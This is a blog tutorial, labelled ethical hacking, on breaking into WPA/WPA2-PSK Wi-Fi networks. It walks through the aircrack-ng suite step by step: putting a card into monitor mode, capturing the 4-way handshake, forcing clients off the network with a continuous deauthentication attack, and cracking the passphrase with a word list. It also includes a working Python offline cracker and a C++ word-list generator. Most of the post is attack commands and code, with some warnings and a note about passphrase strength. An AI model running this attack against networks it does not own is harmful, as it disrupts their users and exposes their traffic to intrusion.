Monday, February 17, 2020

Hacking a WPA/WPA2 PSK Wi-Fi network. #Ethical hacking Tutorials

Before discussing this topic I want to make clear that I am not promoting any sort of illegal hacking. This article is written and published only to raise awareness of how easy it is to break into a WPA/WPA2 Wi-Fi network whose passphrase is weak.
Warning: Breaking into other people's Wi-Fi networks and stealing their data is a serious offence, and serious action will be taken against you if you get caught. Only test networks you own or have written permission to test. I never promote illegal hacking.
In the name WPA/WPA2 PSK, WPA stands for Wi-Fi Protected Access, WPA2 is its successor (the version you will meet on almost every network today), and PSK stands for pre-shared key: the mode where everybody joins the network with the same passphrase, as opposed to the enterprise mode that uses a RADIUS server and per-user credentials.

The passphrase of a WPA/WPA2 PSK network is between 8 and 63 ASCII characters long.
Before attacking a WPA/WPA2 PSK network we need to know how it actually works. When a device joins, the user enters the passphrase assigned to that SSID, but the passphrase itself is never transmitted over the air, not even encrypted. Instead, both the client and the router turn the passphrase and the SSID into a 256-bit Pairwise Master Key (PMK) with PBKDF2 (4096 iterations of HMAC-SHA1). The router and the client then exchange four EAPOL-Key frames over 802.11, the so-called 4-way handshake, carrying a random nonce from each side (ANonce from the router, SNonce from the client). From the PMK, the two nonces and the two MAC addresses each side derives the Pairwise Transient Key (PTK), and the client proves it knows the PMK by attaching a message integrity code (MIC) to its handshake messages, computed with the first 16 bytes of the PTK. If the MIC the router computes matches, the client is admitted; if not, the association is dropped. Everything needed to recompute that MIC except the passphrase (SSID, MAC addresses, nonces and the frame itself) is sent in the clear, so if we capture the handshake we can test candidate passphrases against it offline, one word list entry at a time. Nothing is "decrypted": each guess is run through the same derivation until one reproduces the captured MIC.

A word list is a text file of candidate passphrases, one per line. Only entries of 8 to 63 characters can be valid WPA passphrases, so shorter ones are wasted space. It cannot realistically contain "all possible combinations": even the 8-character lowercase-plus-digits space alone is 36^8 (about 2.8 trillion) entries, and every guess costs 4096 HMAC-SHA1 iterations, so in practice a list of likely passwords is used (leaked password dumps, dictionary words, dates and phone numbers, common patterns). A purely numeric 8-digit list like the one generated at the end of this post is only 10^8 entries and still takes hours to run through.

In this tutorial I am using the aircrack-ng suite (airmon-ng, airodump-ng, aireplay-ng and aircrack-ng) on Kali Linux to explain how anyone can attack a WPA/WPA2 network with a weak passphrase.

STEP 1

Open terminal in Kali Linux and enter the following command.

   root@kali:~ #  airmon-ng check kill                                                                    

This command kills processes such as NetworkManager and wpa_supplicant that would otherwise keep using the wireless card and interfere with monitor mode. Your normal Wi-Fi connection will drop; restarting NetworkManager afterwards brings it back.

STEP 2

Now we have to scan the all available wi-fi networks until we find our targeted wi-fi network.

   root@kali:~ #  airodump-ng <network interface name>                                   
The above command scans all channels and lists every network within range with its BSSID (the router's MAC address), channel (CH), encryption and ESSID, plus the clients associated with each one in the STATION section. Once you have found the target network, press Ctrl+C to stop scanning and note its BSSID and channel.
The network interface name is the name of the wireless card; with a single card it is usually wlan0. airodump-ng needs the card in monitor mode, which is enabled with airmon-ng start wlan0; the monitor interface it creates is typically called wlan0mon, and that is the name to use in the remaining commands. Not every card or driver supports monitor mode and packet injection, so check that first.


STEP 3
Once you have found the target network, lock the card onto its channel and capture only its traffic.
   root@kali:~ #  airodump-ng -c <channel> -w <file name to save> --bssid <BSSID> <network interface name>

The above command records the frames of that one network to disk; with -w <prefix> the capture is written as <prefix>-01.cap. What we want in that file is the 4-way handshake (the EAPOL-Key frames) of a client joining the network, because the MIC in those frames is what the passphrase guesses will later be checked against. Leave this terminal running: it will tell us when a handshake has been captured.



STEP 4

Open a new terminal window and enter the following command.

   root@kali:~ #  aireplay-ng -0 0 -a <BSSID> <network interface name>
The above command runs a de-authentication attack: -0 selects deauthentication, the following 0 means keep sending it until stopped (a number such as 5 sends that many bursts instead), and -a gives the target router's BSSID. It forges frames in the router's name telling every connected client to disconnect; the clients reconnect automatically and perform a fresh 4-way handshake, which airodump-ng in the other terminal captures. The attack only helps if at least one client is actually connected (check the STATION column in airodump-ng), and -c <client MAC> limits the deauthentication to a single client instead of knocking everyone off the network.

Watch the first terminal: when airodump-ng has captured the handshake it shows "WPA handshake: <BSSID>" in the top-right corner of its output.

Once that appears, press Ctrl+C in the aireplay-ng terminal to stop the de-authentication attack, and Ctrl+C in the airodump-ng terminal to close the capture file.
We now have the handshake on disk, but not the passphrase; what remains is to recover it by trying candidate passphrases against the capture.
STEP 5

The word list is explained at the end of this post. Run:
   root@kali:~ #  aircrack-ng -w <path to word list> <capture file with extension .cap>


aircrack-ng first confirms that the file holds a usable handshake for the network (it lists it with "1 handshake"; if the capture contains several networks, add -b <BSSID> to pick the target), then derives a key from each word in the list and checks it against the captured handshake. When one matches it prints "KEY FOUND! [ <passphrase> ]". If it reaches the end of the list it prints "Passphrase not in dictionary": the capture is fine, the passphrase simply was not in your list, and the only remedies are a better list or a faster cracker (hashcat on a GPU handles the same capture far quicker).
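The following Python script is an added example, not code from the original tutorial or from the aircrack-ng project. It shows what aircrack-ng actually does in this step, and why the description of the handshake earlier in the post matters: each candidate passphrase is turned into the PMK with PBKDF2, the PTK is derived from the PMK, the two MAC addresses and the two nonces, and the MIC over EAPOL message 2 is recomputed and compared with the one in the captured frame. The SSID, MAC addresses, nonces and the handshake frame are all constructed inside the script (there is no real capture), the true passphrase is used only to fabricate that frame, and the frame is laid out as a WPA2 (RSN, key descriptor version 2) EAPOL-Key message so the MIC sits at byte offset 81 exactly as in a real capture. Standard library only.

```python
"""Offline WPA2-PSK passphrase test, the way aircrack-ng does it.
Added example for this tutorial, not code from the original page or from the
aircrack-ng project. Every handshake value below is CONSTRUCTED in this file;
nothing is captured from the air. Standard library only."""
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_sha1(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).
    48 bytes for CCMP; the first 16 bytes are the KCK, the key that authenticates EAPOL frames."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_sha1(pmk, b"Pairwise key expansion", data, 48)


# EAPOL-Key frame layout: 4-byte EAPOL header, then descriptor type(1), key info(2),
# key length(2), replay counter(8), nonce(32), IV(16), RSC(8), ID(8), MIC(16), data len(2).
MIC_OFFSET = 81


def build_eapol_msg2(snonce: bytes, replay_counter: int = 1) -> bytes:
    """Message 2 of the 4-way handshake with a zeroed MIC field.
    Key Info 0x010a = descriptor version 2 (HMAC-SHA1 MIC), pairwise, MIC present."""
    body = struct.pack(">BHHQ", 2, 0x010A, 16, replay_counter)  # RSN descriptor, CCMP key length 16
    body += snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + struct.pack(">H", 0)
    return struct.pack(">BBH", 1, 3, len(body)) + body  # EAPOL version 1, type 3 = EAPOL-Key


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 MIC: HMAC-SHA1 over the whole EAPOL frame with the MIC field zeroed, first 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol):
    """Try each candidate until one reproduces the MIC carried in the captured frame."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:
            continue  # cannot be a WPA passphrase, no point spending 4096 HMACs on it
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), captured_mic):
            return candidate
    return None


# ---- constructed "capture" (made-up SSID, MACs and nonces for this example) ----
SSID = "ExampleNet"
AP_MAC = bytes.fromhex("001337123456")
STA_MAC = bytes.fromhex("00aabbccddee")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
_TRUE_PASSPHRASE = "correcthorse"  # used only to fabricate the frame below
_kck = ptk_from_pmk(pmk_from_passphrase(_TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
_frame = build_eapol_msg2(SNONCE)
CAPTURED_MSG2 = _frame[:MIC_OFFSET] + eapol_mic(_kck, _frame) + _frame[MIC_OFFSET + 16:]

if __name__ == "__main__":
    wordlist = ["password", "12345678", "short", "correcthorse", "letmein1"]  # tiny constructed list
    found = crack(wordlist, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_MSG2)
    print("KEY FOUND:", found if found else "passphrase not in dictionary")
```

The cost is the thing to notice: every candidate goes through 4096 HMAC-SHA1 iterations before the cheap MIC comparison, which is why a CPU manages only a few thousand guesses per second and why the quality of the word list matters more than the speed of the machine. A real capture must also be complete before this check means anything: a frame carrying the ANonce (message 1 or 3) and the client's message 2 with its SNonce and MIC, or the MIC has nothing to be compared against.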





This is how a WPA/WPA2 PSK network can be attacked with the aircrack-ng suite on Kali Linux, provided its passphrase is in the word list. A long random passphrase is not in any list, which is the whole defence.

I prepared a word list but I cannot upload the file, so I wrote a small program to generate it; run it on your PC to obtain the word list, or download one from the internet (Kali already ships rockyou.txt under /usr/share/wordlists, which is a far better starting point than pure digits).

Code to generate an 8-digit numeric word list (every string from 00000000 to 99999999, 10^8 lines, about 900 MB on disk):

#include <fstream>
#include <iomanip>

int main() {
    // Writes every 8-digit numeric string (00000000 .. 99999999) to craker.txt,
    // one per line: 10^8 lines of 9 bytes each, roughly 900 MB on disk.
    std::ofstream out("craker.txt");
    if (!out) return 1;
    const unsigned long limit = 100000000UL;  // 10^8 candidates
    for (unsigned long n = 0; n < limit; ++n) {
        // setw/setfill keep the leading zeros; '\n' instead of endl avoids flushing
        // the stream after every single line, which made the original version very slow.
        out << std::setw(8) << std::setfill('0') << n << '\n';
    }
    return 0;
}


If you have any doubts about this tutorial, drop them in the comments section below and I will get to them.
If you face any difficulty while going through this tutorial, I made a video tutorial that you can watch at the link below:
https://youtu.be/00EhvJM0sjo
